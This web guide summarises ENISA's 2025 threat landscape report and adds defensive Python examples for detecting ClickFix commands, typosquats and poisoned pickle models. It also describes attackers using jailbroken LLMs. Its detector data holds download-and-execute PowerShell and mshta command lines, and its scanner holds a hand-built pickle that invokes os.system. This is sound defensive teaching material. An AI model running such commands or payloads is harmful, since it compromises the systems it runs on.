ENISA Threat Landscape 2025 Guide | Libertify
Table of Contents
- Executive Overview: Key Findings from ENISA 2025
- Phishing Dominance: The Primary Cyber Attack Vector
- AI-Enhanced Cybersecurity Threats and Attack Methods
- Vulnerability Exploitation and Rapid Weaponization Trends
- DDoS Attacks and Hacktivist Campaign Evolution
- Ransomware Ecosystem Transformation in 2025
- Supply Chain and Third-Party Security Vulnerabilities
- Mobile and Telecommunications Threat Landscape
- Sector-Specific Cybersecurity Risks and Impacts
- Critical Defense Strategies and Recommendations
📌 Key Takeaways
- Phishing Leads Attack Vectors: 60% of intrusions begin with phishing, enhanced by AI automation and sophisticated social engineering techniques
- AI-Assisted Attacks: Over 80% of observed social engineering campaigns now use AI assistance, including jailbroken or uncensored LLMs and deepfake audio and video
- Supply Chain Targeting: Attackers increasingly compromise repositories, browser extensions, and managed service providers for amplified impact
- Critical Infrastructure Focus: Public administration faces 38.2% of attacks, with transport and digital infrastructure emerging as high-value targets
- Defense Modernization Required: Organizations need phishing-resistant MFA, continuous monitoring, and AI governance frameworks to counter evolving threats
Executive Overview: Key Findings from ENISA 2025
The European Union Agency for Cybersecurity (ENISA) has released its comprehensive Threat Landscape 2025 report, analyzing 4,875 cybersecurity incidents occurring between July 2024 and June 2025. This landmark study reveals a cybersecurity environment characterized by increasing sophistication, AI integration, and targeted attacks on critical infrastructure.
The report’s most striking finding centers on phishing’s continued dominance as the primary attack vector, responsible for 60% of successful intrusions. This statistic underscores the persistent human element in cybersecurity failures, even as organizations invest billions in technical defenses. ENISA’s analysis demonstrates that traditional security awareness training has proven insufficient against increasingly sophisticated social engineering campaigns.
Beyond phishing, vulnerability exploitation accounts for 21.3% of initial intrusion vectors, while DDoS makes up 76.7% of all recorded incidents. The two figures measure different things: the first is a share of how intrusions begin, the second a share of incident volume, inflated by high-frequency and mostly short-lived hacktivist DDoS. Read together they describe attackers pursuing precise access through vulnerabilities and broad disruption through denial of service, a combination that is harder to defend against than either alone.
Perhaps most concerning is the rapid integration of artificial intelligence into attack methodologies. The report cites over 80% of observed social engineering campaigns using AI assistance between September 2024 and February 2025, marking a fundamental shift in how cybercriminals develop and execute their operations. AI lets attackers scale personalized phishing and produce convincing impersonations at a volume that manual campaigns could not reach.
Phishing Dominance: The Primary Cyber Attack Vector
Phishing continues to evolve beyond simple email campaigns, incorporating sophisticated techniques that challenge traditional security measures. The ENISA report identifies several emerging phishing methodologies that organizations must address to maintain effective defenses against social engineering attacks.
Phishing-as-a-Service (PhaaS) platforms have democratized access to advanced phishing tools, enabling low-skilled attackers to launch sophisticated campaigns. These platforms provide pre-built templates, hosting infrastructure, and credential harvesting capabilities, effectively lowering the barrier to entry for cybercriminal activities. The commercialization of phishing tools has led to a significant increase in campaign volume and sophistication across all sectors.
QR code phishing, termed “quishing” by security researchers, is a particularly effective evolution of traditional phishing. Because the malicious URL is embedded in an image rather than written as a link, it passes email filters that only inspect text URLs, and the victim opens it on a personal phone that sits outside the corporate web proxy. The technique works especially well in mobile-first environments where users routinely scan codes for legitimate business purposes.
The “ClickFix” methodology goes a step further, from credential theft to direct system compromise. A fake error page, CAPTCHA or “fix” prompt instructs the user to press Win+R (or open a terminal), paste what the page has silently placed on the clipboard, and press Enter; the pasted text is typically a PowerShell or mshta command that downloads and runs a payload. Because the user executes the command themselves, no exploit or macro is needed and many email and download controls never see the payload. The psychological lever is the user’s wish to resolve a perceived technical problem.
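One way to detect the ClickFix pattern described above in process-creation telemetry, as an added example that is not part of the ENISA report. It assumes Sysmon Event ID 1 or Windows 4688 style events with a parent image and command line; the sample events, the indicator regexes and the parent-process allow list are constructed for the example.

```python
"""Flag ClickFix-style command lines in process-creation telemetry.

Added example, not from the ENISA report. The events below are constructed to
resemble Sysmon Event ID 1 / Windows 4688 fields (parent image, command line).
The indicators encode the traits ClickFix lures share: the victim pastes a
command into the Win+R box or a terminal, so the parent is the desktop shell,
and the command hides its window, fetches remote content and executes it.
"""
import re

# Constructed sample events: (parent image, command line).
# Events 1 and 3 are ClickFix chains; the others are ordinary admin activity.
SAMPLE_EVENTS = [
    ("explorer.exe", 'powershell.exe -w hidden -nop -c "irm https://example.invalid/fix.ps1 | iex"'),
    ("explorer.exe", "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    ("explorer.exe", "mshta.exe https://example.invalid/verify.hta"),
    ("cmd.exe", "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("services.exe", "powershell.exe -NoProfile -Command Get-Service"),
]

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(?:ncodedcommand|nc)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
}

# ClickFix runs whatever the user pasted into Win+R, so the parent is the
# desktop shell rather than a script host, scheduler or management agent.
INTERACTIVE_PARENTS = {"explorer.exe"}


def score_event(parent: str, cmdline: str) -> dict:
    """Return matched indicators and a verdict for one process-creation event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    from_shell = parent.lower() in INTERACTIVE_PARENTS
    # Two or more traits from an interactive parent, or any remote mshta launch,
    # is treated as ClickFix; a lone -File or -enc from an agent is left to
    # other rules so signed admin scripts do not page anyone.
    suspicious = (from_shell and len(hits) >= 2) or "mshta_remote" in hits
    return {"parent": parent, "cmdline": cmdline, "hits": hits, "suspicious": suspicious}


def find_clickfix(events=SAMPLE_EVENTS) -> list:
    """Score every event and keep the ones that look like ClickFix."""
    return [s for s in (score_event(p, c) for p, c in events) if s["suspicious"]]


if __name__ == "__main__":
    for finding in find_clickfix():
        print(finding["parent"], finding["hits"], finding["cmdline"])
```

The parent-process condition is what keeps this rule quiet: the same cradle launched by a scheduler or management agent is a different investigation. In production the command-line field should be decoded before matching, since ClickFix payloads are often delivered as `-enc` Base64.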
Organizations looking to combat evolving phishing threats should explore interactive cybersecurity training programs that simulate real-world attack scenarios and help employees recognize sophisticated social engineering attempts.
AI-Enhanced Cybersecurity Threats and Attack Methods
Artificial intelligence has fundamentally transformed the cybersecurity threat landscape, with malicious actors leveraging AI technologies to enhance attack effectiveness, scale operations, and evade traditional security controls. The ENISA report documents a concerning trend of AI weaponization across multiple attack vectors.
Uncensored and jailbroken large language models marketed under names such as WormGPT and FraudGPT have become staple tools for generating malicious content: phishing emails, malware code, and social engineering scripts. Some are jailbroken wrappers around commercial models, others fine-tuned open-weight models; either way the safety constraints of mainstream platforms are absent, and cybercriminals can automate content creation at scale. Their sale on dark web marketplaces has democratized AI-powered attack capabilities.
Stand-alone malicious AI systems such as Xanthorox represent the next step. Rather than a jailbroken wrapper around a public model, Xanthorox is marketed as a self-hosted platform that combines several models with attack tooling, so it neither depends on a provider’s API nor leaves traces there. Such systems can generate and revise attack content in response to what the operator sees from the target and its defenses, which sets them apart from tooling with fixed behaviour.
Deepfake technology has introduced unprecedented challenges for organizational security, particularly in business email compromise (BEC) scenarios. Attackers can now create convincing audio and video content impersonating executives, board members, or trusted partners. These deepfake attacks have proven particularly effective in financial fraud scenarios, where urgent requests for fund transfers or sensitive information appear to come from legitimate sources.
Supply chain attacks targeting AI infrastructure represent an emerging threat vector with potentially catastrophic consequences. The report documents instances of poisoned machine learning models, compromised training data, and backdoors in AI development tools. As organizations increasingly integrate AI into core business processes, these supply chain vulnerabilities create new attack surfaces for sophisticated threat actors.
The NIST AI Risk Management Framework provides essential guidance for organizations seeking to secure their AI implementations against emerging threats and vulnerabilities.
Vulnerability Exploitation and Rapid Weaponization Trends
The 2025 threat landscape reveals an acceleration in vulnerability exploitation timelines, with cybercriminals weaponizing disclosed vulnerabilities at unprecedented speeds. ENISA’s analysis shows that 70% of vulnerability-based incidents result in successful intrusions, highlighting the critical importance of rapid patch management and vulnerability prioritization.
The concept of “zero-day to exploit” timelines has compressed dramatically, with some vulnerabilities being exploited within hours of public disclosure. This rapid weaponization challenges traditional patch management approaches that rely on monthly update cycles or lengthy testing periods. Organizations must now balance system stability with security urgency in their vulnerability response strategies.
Several high-impact vulnerabilities dominated the 2025 landscape, including remote code execution flaws in popular software platforms and server-side request forgery (SSRF) vulnerabilities. CVE-2024-27564, an SSRF in the `url` parameter of `pictureproxy.php` in a widely self-hosted open-source ChatGPT front-end, illustrates the pattern: the flaw is exploitable with a single crafted HTTP request, its details had been public since the CVE was published in early 2024, and mass exploitation attempts against organizations in multiple sectors were reported in 2025. The lesson is not only that disclosure-to-exploitation windows are shrinking, but that a low-complexity bug in a widely deployed component stays attractive for as long as unpatched instances remain reachable.
Supply chain vulnerabilities in development tools and platforms have emerged as particularly attractive targets for threat actors. The compromise of package repositories, integrated development environments, and continuous integration/continuous deployment (CI/CD) pipelines enables attackers to inject malicious code into multiple downstream applications simultaneously.
Exploit brokers and vulnerability marketplaces, alongside bug bounty platforms, have created new dynamics in the exploit economy. While bounty programs aim to channel findings into responsible disclosure, the same demand lets malicious actors buy detailed vulnerability information and working exploit code. Organizations should monitor these markets as part of their threat intelligence operations, since a listing for a product in their estate is an early warning.
Effective vulnerability management requires more than traditional scanning approaches. Consider implementing comprehensive risk assessment frameworks that prioritize vulnerabilities based on business impact and threat intelligence rather than severity scores alone.
DDoS Attacks and Hacktivist Campaign Evolution
Distributed Denial of Service (DDoS) attacks continue to dominate the cybersecurity incident landscape, accounting for 76.7% of recorded events in the ENISA 2025 analysis. However, the nature and motivation behind these attacks have evolved significantly, with hacktivist groups leveraging DDoS as a tool for political expression and social disruption.
Modern hacktivist campaigns demonstrate sophisticated coordination and targeting strategies, moving beyond simple website defacements to sustained disruption campaigns against critical infrastructure. These groups leverage social media platforms and encrypted communication channels to organize distributed attacks, often mobilizing thousands of participants for coordinated assault campaigns.
The convergence of hacktivist, cybercriminal, and state-aligned threat actors has created complex attribution challenges for incident response teams. “Faketivism” campaigns utilize hacktivist branding to mask state-sponsored operations, while legitimate hacktivist groups may unknowingly serve the interests of nation-state actors through their disruptive activities.
Low-cost, high-impact DDoS techniques have democratized the ability to launch disruptive attacks. Cloud-based attack infrastructure, IoT botnets, and amplification techniques enable attackers to generate massive traffic volumes with minimal resource investment. These attacks particularly target public administration systems, exploiting their public-facing nature and critical service delivery functions.
The geographic concentration of DDoS attacks reveals targeting patterns, with France experiencing 27% of public administration incidents, followed by Italy at 26.3% and Germany at 16.2%. Spikes of this kind typically follow political triggers (elections, summits, government statements), which points to campaigns chosen for their message rather than purely opportunistic targeting.
Ransomware Ecosystem Transformation in 2025
The ransomware landscape has undergone significant transformation following intensified law enforcement pressure and international cooperation efforts. While traditional ransomware groups have adapted their operations, new actors have emerged to fill operational gaps, creating a more decentralized and resilient criminal ecosystem.
Ransomware-as-a-Service (RaaS) platforms continue to proliferate despite law enforcement actions against major groups. These platforms enable affiliate attackers to access sophisticated encryption tools, payment infrastructure, and victim negotiation services without developing technical capabilities independently. The commercialization of ransomware operations has led to increased specialization and professionalization within criminal networks.
New extortion techniques have emerged as organizations improve backup and recovery capabilities. Double extortion campaigns that combine data encryption with data theft and leak threats have proven particularly effective. Triple extortion adds additional pressure through direct victim contact, customer notification, and regulatory disclosure threats. Some groups now pursue extortion without encryption, focusing solely on data theft and leak threats.
The targeting of supply chain partners and managed service providers represents a strategic evolution in ransomware operations. By compromising a single managed service provider, attackers can potentially impact dozens of downstream organizations simultaneously. This approach maximizes return on investment while complicating incident response and recovery efforts.
Notable ransomware families documented in the report include NightSpire, SafePay, and Stormous, each demonstrating unique technical capabilities and targeting strategies. The apparent reduction in LockBit activity during the reporting period illustrates the impact of coordinated law enforcement operations on established ransomware groups.
Supply Chain and Third-Party Security Vulnerabilities
Supply chain attacks have emerged as one of the most significant threats in the 2025 cybersecurity landscape, with attackers recognizing the multiplicative impact of compromising shared infrastructure, software components, and service providers. ENISA’s analysis reveals a concerning trend toward sophisticated supply chain targeting across multiple vectors.
Software repository compromises represent a particularly insidious form of supply chain attack. Malicious packages in npm, PyPI, and other popular repositories can propagate to thousands of applications without detection. These attacks often utilize typosquatting, dependency confusion, and maintainer account compromise to inject malicious code into legitimate software supply chains.
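The two repository tricks named above, typosquatting and dependency confusion, can be screened for before a build runs. The following is an added example, not from the ENISA report: it audits a pip requirements file, flags names one edit away from a well-known package, and flags internal packages that would be resolvable from the public index because the file uses `--extra-index-url`. The popular-package list, the `acme-` internal prefix, the index URLs and both requirements files are constructed for the example.

```python
"""Audit a requirements file for typosquats and dependency-confusion exposure.

Added example, not from the ENISA report. Two checks from the text:
1. Typosquatting: a requested name one edit away from a well-known package.
2. Dependency confusion: an internal package requested in a file that also
   lists --extra-index-url, so pip will consider the public index too and take
   whichever index offers the higher version.
The popular-package list, the internal name prefix and both requirements files
are constructed assumptions.
"""
import re

POPULAR = {"requests", "urllib3", "numpy", "pandas", "cryptography", "boto3", "pyyaml"}
INTERNAL_PREFIX = "acme-"

# Constructed: the weak layout (public index first, private index as extra) plus
# a transposed-letter typosquat of requests.
WEAK_REQUIREMENTS = """
--index-url https://pypi.org/simple
--extra-index-url https://pypi.acme.example/simple
requests==2.32.3
reqeusts==2.32.3
numpy>=1.26
acme-billing>=1.0
acme-auth==3.1.0
python-dateutil==2.9.0
"""

# Constructed: the hardened layout. One private index that proxies PyPI and
# owns every acme-* name, so no public package can shadow an internal one.
HARDENED_REQUIREMENTS = """
--index-url https://pypi.acme.example/simple
requests==2.32.3
numpy>=1.26
acme-billing>=1.0
acme-auth==3.1.0
python-dateutil==2.9.0
"""


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap adjacent."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def audit(text: str) -> list:
    """Return (check, package, detail) findings for one requirements file."""
    extra_index, names = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("--extra-index-url"):
            extra_index.append(line.split(None, 1)[1])
            continue
        if line.startswith("-"):
            continue                       # --index-url, --hash and other options
        m = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)", line)
        if m:
            names.append(m.group(1).lower().replace("_", "-"))

    findings = []
    for name in names:
        if name in POPULAR:
            continue
        near = sorted(p for p in POPULAR if edit_distance(name, p) == 1)
        if near:
            findings.append(("typosquat", name, f"one edit from {near[0]}"))
        if name.startswith(INTERNAL_PREFIX) and extra_index:
            findings.append(("dependency-confusion", name,
                             "internal name resolvable from a public index via --extra-index-url"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_REQUIREMENTS), ("hardened", HARDENED_REQUIREMENTS)):
        print(label, audit(text))
```

The hardened file passes because a single `--index-url` pointing at a private index that proxies PyPI removes the race between two indexes; pinning with `--hash` values closes the remaining gap if the proxy itself is ever compromised.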
Browser extension compromise has become an increasingly popular attack vector, leveraging users’ trust in browser add-ons and extensions. Attackers compromise legitimate extensions through developer account takeover or inject malicious updates into popular extensions. Once installed, these compromised extensions can harvest credentials, intercept communications, and serve as persistent backdoors into target organizations.
Managed Service Provider (MSP) targeting represents perhaps the most impactful form of supply chain attack. By compromising a single MSP, attackers can gain access to multiple customer environments simultaneously. The interconnected nature of modern IT services means that MSP compromise can cascade across entire industry sectors or geographic regions.
AI supply chain vulnerabilities represent an emerging concern as organizations increasingly integrate artificial intelligence into core business processes. Attacks on AI infrastructure include poisoned training data, compromised models, and backdoors in AI development frameworks. The complexity and opacity of AI systems make these vulnerabilities particularly challenging to detect and mitigate.
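The poisoned-model risk raised here and in the AI threats section above has a concrete, checkable form: most PyTorch and scikit-learn checkpoints are pickle streams, and `pickle.load()` will import and call any global the stream names. The following is an added example, not from the ENISA report, that walks a model file’s opcodes with `pickletools.genops()` without ever loading it, lists every global the file would import, and refuses anything off an allow list. The benign and backdoored sample blobs and the allow list are constructed for the example.

```python
"""Inspect a serialized ML model for code-execution opcodes without loading it.

Added example, not from the ENISA report. pickle.load() executes any global
named in the stream; pickletools.genops() only walks the opcodes, so we can
enumerate what a checkpoint would import and call before deciding to load it.
"""
import collections
import pickle
import pickletools

# Constructed samples. BENIGN_MODEL is an ordinary pickled dict of weights.
# WRAPPED_MODEL uses an OrderedDict, as PyTorch state_dicts do (protocol 4,
# so the global arrives via STACK_GLOBAL). POISONED_MODEL is hand-built: it
# names os.system and invokes it with REDUCE, which is what a backdoored
# checkpoint does the moment it is loaded.
BENIGN_MODEL = pickle.dumps({"layer1.weight": [0.1, -0.2, 0.3], "bias": [0.0]})
WRAPPED_MODEL = pickle.dumps(collections.OrderedDict(weight=[1.0]), protocol=4)
POISONED_MODEL = b"cos\nsystem\n(S'echo pwned'\ntR."

# Globals a plain checkpoint legitimately needs (constructed for the example;
# derive a real allow list from the framework actually in use).
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("numpy.core.multiarray", "_reconstruct"),
    ("numpy", "ndarray"),
    ("numpy", "dtype"),
    ("torch._utils", "_rebuild_tensor_v2"),
}
# Opcodes that invoke a callable during load.
CALL_OPCODES = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "UNICODE",
                  "STRING", "SHORT_BINSTRING", "BINSTRING"}


def referenced_globals(data: bytes) -> list:
    """Return (module, name) pairs the stream would import, in order.

    Tracks only string pushes and the memo, which is all STACK_GLOBAL needs;
    it does not emulate the full pickle machine.
    """
    found, strings, memo = [], [], {}
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                 # protocol 0-3: "module name"
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
        elif op.name in STRING_OPCODES:
            strings.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = strings[-1] if strings else None
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = strings[-1] if strings else None
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            if memo.get(arg) is not None:
                strings.append(memo[arg])
        elif op.name == "STACK_GLOBAL":         # protocol 4+: two strings on stack
            found.append((strings[-2], strings[-1]))
    return found


def scan_model(data: bytes) -> dict:
    """Classify a pickle stream; never calls pickle.loads()."""
    globals_seen = referenced_globals(data)
    calls = [op.name for op, _a, _p in pickletools.genops(data) if op.name in CALL_OPCODES]
    disallowed = [g for g in globals_seen if g not in ALLOWED_GLOBALS]
    return {
        "globals": globals_seen,
        "call_opcodes": calls,
        "disallowed": disallowed,
        "safe_to_load": not disallowed,
    }


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_MODEL), ("wrapped", WRAPPED_MODEL),
                        ("poisoned", POISONED_MODEL)):
        print(label, scan_model(blob))
```

The scan is a gate, not a guarantee: an allow-listed global can still be abused if the framework itself has a gadget. Preferring formats that carry no executable content (safetensors, ONNX) removes the class of problem rather than filtering it.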
Organizations must implement comprehensive vendor management frameworks that address third-party risk assessment, continuous monitoring, and incident response coordination across the entire supply chain ecosystem.
Mobile and Telecommunications Threat Landscape
Mobile devices and telecommunications infrastructure face increasingly sophisticated attacks as these platforms become central to business operations and personal communications. The ENISA report documents significant evolution in mobile-specific threats, with attackers exploiting both device-level vulnerabilities and telecommunications protocol weaknesses.
Android Remote Access Trojans (RATs) and spyware have proliferated across European markets. The families named in the report span both criminal tooling (Rafel, BingoMod) and state-aligned surveillance implants (KoSpy, BoneSpy, PlainGnome, EagleMsgSpy), each aimed at specific regions or user groups. Their capabilities include keylogging, screen recording, monitoring of financial applications, and SMS interception, the last of which directly undermines SMS-delivered one-time codes.
Banking trojans specifically targeting mobile platforms have evolved to bypass traditional two-factor authentication systems. The Medusa banking trojan exemplifies these capabilities, intercepting SMS messages, overlaying legitimate banking applications with fraudulent interfaces, and stealing authentication credentials in real-time. These threats pose particular challenges for financial institutions relying on SMS-based authentication systems.
Telecommunications protocol vulnerabilities in SS7 and Diameter systems enable sophisticated attackers to intercept communications, track locations, and redirect phone calls. These protocol-level attacks require privileged access to telecommunications infrastructure, typically limiting them to nation-state actors or advanced criminal organizations with insider access to telecommunications providers.
Digital Signal Processor (DSP) vulnerabilities in mobile chipsets have emerged as a new attack vector, with Qualcomm chipsets experiencing notable security flaws during the reporting period. These low-level vulnerabilities can enable persistent device compromise, bypassing traditional mobile device management (MDM) and security controls.
Mobile-specific campaigns have been documented across multiple European countries, with particular activity in Czechia, France, Germany, Italy, and Romania. The geographic distribution of these campaigns suggests both opportunistic and targeted approaches, with some attacks focusing on specific industries or high-value individuals.
The CISA Mobile Device Security guidelines provide comprehensive recommendations for organizations seeking to protect mobile devices and telecommunications infrastructure from evolving threats.
Sector-Specific Cybersecurity Risks and Impacts
The ENISA 2025 report reveals significant variation in cybersecurity threats across different economic sectors, with public administration bearing the heaviest attack burden while critical infrastructure sectors face increasingly sophisticated targeting strategies.
Public administration leads all sectors with 38.2% of attributed cybersecurity incidents, driven primarily by hacktivist-led DDoS campaigns accounting for 96.2% of DDoS attacks against this sector. The public-facing nature of government services, combined with their symbolic value for political protest, makes public administration an attractive target for disruptive attacks.
The transport sector has emerged as a high-priority target, accounting for 7.5% of incidents with particular focus on maritime, logistics, and aviation systems. Ransomware attacks against transport infrastructure can cascade across supply chains, affecting freight movement, passenger services, and economic activity. Recent incidents have targeted ticketing systems, freight management platforms, and airport operations.
Digital infrastructure and services face strategic targeting by sophisticated threat actors seeking to compromise multiple downstream organizations simultaneously. At 4.8% of incidents, this sector experiences some of the most technically advanced attacks, including supply chain compromises and advanced persistent threat (APT) campaigns aimed at long-term access and data collection.
Financial services continue to attract cybercriminal attention, representing 4.5% of incidents with particular focus on banking trojans, mobile fraud, and credential theft operations. The financial sector’s regulatory requirements and customer data sensitivity make it an attractive target for both financially motivated cybercriminals and espionage-focused threat actors.
Manufacturing faces increasing cyber threats as industrial systems become more connected and integrated with corporate networks. At 2.9% of incidents, manufacturing targets include both intellectual property theft and operational technology (OT) disruption, with attacks potentially affecting production schedules, quality control, and safety systems.
Critical Defense Strategies and Recommendations
The evolving threat landscape documented in ENISA’s 2025 report demands a comprehensive and adaptive approach to cybersecurity defense. Organizations must implement layered security strategies that address both technical vulnerabilities and human factors while remaining agile enough to counter emerging threats.
Phishing-resistant multi-factor authentication is perhaps the most critical defense investment an organization can make. SMS codes, email-delivered codes and push approvals can all be relayed by an adversary-in-the-middle phishing kit, so they fail against exactly the campaigns the report describes. FIDO2/WebAuthn authenticators (hardware security keys or platform passkeys, where a biometric or PIN unlocks a credential cryptographically bound to the legitimate site’s origin) and certificate-based authentication such as smart cards resist credential theft and account takeover because there is no secret the user can be tricked into typing on a look-alike site.
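What makes WebAuthn phishing-resistant is visible in the relying party’s verification step. The following is an added example, not from the ENISA report and not a complete WebAuthn implementation: it shows the three binding checks a relying party performs before signature verification (the challenge it issued, the origin the browser wrote into `clientDataJSON`, and `rpIdHash` in `authenticatorData`), and why a look-alike domain fails them. The `browser_assertion()` helper stands in for the browser and authenticator; the RP ID, origins and fixed demo challenge are constructed.

```python
"""Relying-party binding checks that make FIDO2/WebAuthn phishing-resistant.

Added example, not from the ENISA report and not a full WebAuthn library.
It shows the three checks a relying party performs before even looking at
the signature: the challenge it issued, the origin the browser recorded in
clientDataJSON, and rpIdHash (SHA-256 of the RP ID) in authenticatorData.
browser_assertion() stands in for the browser and authenticator; the RP ID,
origins and fixed demo challenge are constructed.
"""
import base64
import hashlib
import json
import os

RP_ID = "bank.example"
EXPECTED_ORIGIN = "https://bank.example"
DEMO_CHALLENGE = hashlib.sha256(b"constructed demo challenge").digest()  # fixed for the demo


def new_challenge() -> bytes:
    """Real deployments issue a fresh random challenge per ceremony."""
    return os.urandom(32)


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def browser_assertion(page_origin: str, challenge: bytes, rp_id: str) -> dict:
    """Simplified stand-in for navigator.credentials.get().

    The browser, not the page, writes the origin field, and the authenticator
    hashes the RP ID the credential was scoped to. A phishing page on another
    origin cannot change either value.
    """
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": b64url(challenge),
        "origin": page_origin,
    }).encode()
    flags = b"\x05"                      # UP (user present) | UV (user verified)
    sign_count = b"\x00\x00\x00\x01"
    auth_data = hashlib.sha256(rp_id.encode()).digest() + flags + sign_count
    return {"clientDataJSON": client_data, "authenticatorData": auth_data}


def verify_assertion(assertion: dict, issued_challenge: bytes) -> tuple:
    """Return (ok, reason). Signature verification would follow these checks."""
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if b64url_decode(cd.get("challenge", "")) != issued_challenge:
        return False, "challenge mismatch (replay or another session)"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin mismatch: {cd.get('origin')}"
    auth_data = assertion["authenticatorData"]
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"


if __name__ == "__main__":
    genuine = browser_assertion(EXPECTED_ORIGIN, DEMO_CHALLENGE, RP_ID)
    # An adversary-in-the-middle kit can relay the real challenge, but the
    # victim's browser still records the look-alike origin.
    phished = browser_assertion("https://bank-example.com", DEMO_CHALLENGE, RP_ID)
    print(verify_assertion(genuine, DEMO_CHALLENGE))
    print(verify_assertion(phished, DEMO_CHALLENGE))
```

Contrast this with an SMS code: the relying party receives six digits and has no way to tell whether they were typed on its own page or on the proxy’s. With WebAuthn the origin is part of what is signed, so relaying is detected rather than trusted.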
Rapid vulnerability management programs must replace traditional monthly patch cycles with risk-based prioritization and emergency response capabilities. Organizations should implement continuous vulnerability scanning, threat intelligence integration, and automated patch deployment for critical vulnerabilities. Compensating controls should be deployed immediately for vulnerabilities that cannot be patched quickly.
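The risk-based prioritization called for here, and in the vulnerability exploitation section’s note that severity scores alone are not enough, can be expressed as a small scoring model. The following is an added example, not from the ENISA report: it ranks findings by exploitation evidence (known-exploited listing, EPSS probability) and reachability ahead of CVSS, assigns a tier and SLA, and attaches a compensating-control action where no patch exists. The CVE identifiers, scores and asset names are constructed placeholders, and the weights are assumptions to be tuned per organization.

```python
"""Rank findings by exploitation evidence and exposure, not CVSS alone.

Added example, not from the ENISA report; the CVE rows are constructed
placeholders, not real scores. Inputs per finding: CVSS base score, EPSS
probability, whether the CVE is on a known-exploited list (e.g. CISA KEV),
whether the asset is internet-facing, and asset criticality. Output: a
priority tier and an SLA in days, with a compensating-control note for anything
in the top tier that cannot be patched. Weights are assumptions.
"""
from dataclasses import dataclass


@dataclass
class Finding:
    cve: str
    asset: str
    cvss: float
    epss: float          # probability of exploitation in the next 30 days, 0..1
    known_exploited: bool
    internet_facing: bool
    criticality: int     # 1 (low) .. 3 (crown jewel)
    patch_available: bool = True


# Constructed sample findings. Identifiers are placeholders.
FINDINGS = [
    Finding("CVE-0000-0001", "vpn-gw-1", 9.8, 0.92, True, True, 3),
    Finding("CVE-0000-0002", "build-agent-3", 9.1, 0.04, False, False, 2),
    Finding("CVE-0000-0003", "web-shop", 7.2, 0.61, True, True, 3, patch_available=False),
    Finding("CVE-0000-0004", "hr-laptop-17", 5.3, 0.01, False, False, 1),
    Finding("CVE-0000-0005", "erp-db", 8.8, 0.15, False, False, 3),
]


def risk_score(f: Finding) -> float:
    """Weighted score: evidence of exploitation and reachability dominate severity."""
    score = f.cvss / 10.0                        # 0..1 severity
    score += 2.0 * f.epss                        # likelihood, up to +2
    score += 2.0 if f.known_exploited else 0.0   # confirmed exploitation
    score += 1.0 if f.internet_facing else 0.0   # reachability
    score *= 1 + 0.25 * (f.criticality - 1)      # x1.0 .. x1.5 by asset value
    return round(score, 2)


def tier(f: Finding) -> tuple:
    """(tier, sla_days). Tier 0 is an emergency change outside the monthly cycle."""
    if f.known_exploited and f.internet_facing:
        return 0, 1
    s = risk_score(f)
    if s >= 3.0:
        return 1, 7
    if s >= 1.0:
        return 2, 30
    return 3, 90


def prioritize(findings=FINDINGS) -> list:
    """Order findings by tier, then score, and attach the required action."""
    rows = []
    for f in sorted(findings, key=lambda x: (tier(x)[0], -risk_score(x))):
        t, sla = tier(f)
        action = "patch"
        if not f.patch_available:
            action = ("compensating control now (WAF rule, isolate, disable feature); "
                      "patch when available")
        rows.append({"cve": f.cve, "asset": f.asset, "tier": t, "sla_days": sla,
                     "score": risk_score(f), "action": action})
    return rows


if __name__ == "__main__":
    for row in prioritize():
        print(row)
```

Note how the CVSS 9.1 on an internal build agent lands below the CVSS 7.2 SSRF on an exposed, actively exploited web shop; that inversion is the whole point of moving off severity-only queues, and the build agent still gets a 30-day SLA rather than falling off the list.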
Supply chain security requires comprehensive vendor assessment, continuous monitoring, and contractual security requirements. Organizations must implement Software Bill of Materials (SBOM) tracking, dependency scanning, and third-party risk assessment programs. Incident response plans must include supply chain compromise scenarios and coordination with vendor security teams.
